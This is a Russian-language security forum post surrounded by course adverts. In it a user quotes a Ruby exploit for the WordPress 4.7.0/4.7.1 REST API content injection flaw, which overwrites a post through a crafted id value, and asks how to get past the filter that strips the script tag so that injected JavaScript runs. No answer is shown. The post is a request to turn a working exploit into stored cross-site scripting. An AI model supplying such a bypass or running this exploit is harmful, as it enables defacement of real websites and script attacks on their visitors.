• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Как инжектить JS в уязвимости WP Content Injection?

CryNet

Member
23.09.2020
11
0
BIT
0
В WP 4.7.0 и 4.7.1 есть дыра позволяющая заменить контент на странице.
Есть сплойт:
В сплойте есть строки:
Ruby:
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id" => "#{postid}justrawdata",
    #"title" => "You have been hacked",
    "content" => "<script>console.log(1)</script>"
  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }
При эксплуатации строка <script>console.log(1)</script> превращяется в текст: console.log(1), в HTML это выглядит так: <p>console.log(1)</p>.
Есть способ это пофиксить и отгрузить как JS, чтобы он выполнился?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!